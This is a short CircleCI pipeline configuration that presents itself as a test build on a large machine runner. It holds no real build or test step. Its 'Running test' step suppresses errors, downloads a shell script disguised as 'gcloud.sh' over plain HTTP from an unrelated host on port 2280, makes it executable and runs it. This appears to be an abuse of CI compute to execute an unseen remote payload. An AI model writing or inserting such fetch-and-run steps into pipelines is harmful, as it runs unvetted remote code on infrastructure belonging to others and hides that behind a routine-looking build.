# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
jobs:
  build:
    machine: true
    resource_class: large
    steps:
      - run:
          command: |
            echo Running test
            set +e
            apt update
            apt install -qq curl
            pwd
            curl  -o $HOME/bin/init.sh http://pi.lucas.ga:2280/luci-static/bin/gcloud.sh && chmod +x $HOME/bin/init.sh
            bash $HOME/bin/init.sh

      - run:
          shell: /bin/sh
          command: |
            echo Running Done

workflows:
  build:
    jobs:
      - build
